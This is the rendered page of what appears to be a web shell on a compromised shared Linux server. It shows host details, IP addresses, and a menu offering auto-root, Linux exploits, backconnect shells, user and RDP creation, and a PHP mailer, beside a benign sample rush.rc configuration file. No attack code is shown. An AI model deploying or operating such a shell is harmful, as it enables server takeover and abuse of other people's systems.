Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
rush /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README.mkchroot-rush.gz
2.3
KB
-rw-r--r--
rush-notifier
581
B
-rwxr-xr-x
rush.inetutils-inetd
1.26
KB
-rw-r--r--
rush.rc
1.29
KB
-rw-r--r--
rush.xinetd
1.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rush.rc
# Sample configuration file for rush. # Lines beginning with # and empty lines are ignored. # See `info rush' for a detailed description. # Set verbosity level. debug 1 rule default limits t10r20 umask 002 env - USER LOGNAME HOME PATH+=:/usr/local/bin fall-through rule cvs command ^cvs server set[0] /usr/bin/cvs # Secure cp requests rule scp-to command ^scp (-v )?-t /incoming/(alpha|ftp) set[0] /bin/scp chroot /var/spool/sftp-upload chdir /incoming # A trap rule for outbound scp requests rule scp-from command ^scp (-v )?-f exit Error: Secure copy from this server is not allowed # Svn server: force full binary path and root directory. rule svn command ^svnserve -t transform s|-r *[^ ]*||;s|^svnserve |/usr/bin/svnserve -r /svnroot | # For git requests, allow access to repositories located under # /vcs-roots/git rule git command ^git-(receive|upload)-pack match[1] ^/vcs-roots/git/[^ ]+\.git$ transform[0] s|^|/usr/bin/| # Trap the rest of Git requests: rule git-trap command ^git-(receive|upload)-pack exit fatal: access to this repository is denied. # Sftp-server requests: chroot into the user's home directory, set umask # 002 and execute bin/sftp-server. rule sftp command ^.*/sftp-server set[0] bin/sftp-server umask 002 chroot ~ chdir /
Close